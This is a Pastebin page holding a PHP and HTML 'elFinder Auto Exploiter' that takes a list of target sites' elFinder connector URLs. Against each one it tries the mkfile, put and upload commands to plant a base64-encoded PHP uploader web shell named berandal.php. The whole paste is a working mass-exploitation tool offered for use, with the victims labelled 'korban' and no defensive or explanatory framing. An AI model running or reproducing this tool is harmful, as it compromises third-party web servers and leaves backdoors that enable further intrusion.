daily pastebin goal
56%
SHARE
TWEET

Nazuka Mass Exploiter

Berandal666 Apr 23rd, 2017 90 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <title>Berandal</title>
  3. <style type="text/css">
  4. html {
  5.     text-align: center;
  6. }
  7. a {
  8.     text-decoration: none;
  9.     color: black;
  10. }
  11. </style>
  12. Nitip nick cok!<br>
  13. <h1>Berandal elFinder Auto Exploiter</h1>
  14. <form method="post">
  15. Target: <br>
  16. <textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize:
  17. none;"></textarea><br>
  18. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="SIKAT!">
  19. </form>
  20. </html>
  21. <?php
  22. # Berandal
  23. function ngirim($url, $isi) {
  24. $ch = curl_init ("$url");
  25.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  26.       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  27.       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  28.       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  29.       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  30.       curl_setopt ($ch, CURLOPT_POST, 1);
  31.       curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  32.       curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  33.       curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  34. $data3 = curl_exec ($ch);
  35. return $data3;
  36. }
  37. $target = explode("\r\n", $_POST['target']);
  38. if($_POST['x']) {
  39.     foreach($target as $korban) {
  40.         $nama_doang = "berandal.php";
  41.         $isi_nama_doang =
  42. "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1
  43. lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV
  44. 0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  45.         $decode_isi = base64_decode($isi_nama_doang);
  46.         $encode = base64_encode($nama_doang);
  47.         $fp = fopen($nama_doang,"w");
  48.         fputs($fp, $decode_isi);
  49.         echo "[!] <a href='$korban' target='_blank'>$korban</a> <br>";
  50.         echo "# Upload[1] ......<br>";
  51.         $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  52.         $b = file_get_contents("$url_mkfile");
  53.         $post1 = array(
  54.                 "cmd" => "put",
  55.                 "target" => "l1_$encode",
  56.                 "content" => "$decode_isi",
  57.                 );
  58.         $post2 = array(
  59.                 "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  60.                 "upload[]" => "@$nama_doang",);
  61.         $output_mkfile = ngirim("$korban", $post1);
  62.         if(preg_match("/$nama_doang/", $output_mkfile)) {
  63.             echo "# Upload Sukses 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  64.         } else {
  65.             echo "# Upload Gagal Cok! 1 <br># Uploading 2..<br>";
  66.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
  67.             if(preg_match("/$nama_doang/", $upload_ah)) {
  68.                 echo "# Upload Sukses 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  69.             } else {
  70.                 echo "# Upload Gagal Lagi Cok! 2<br><br>";
  71.             }
  72.         }
  73.     }
  74. }
  75. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top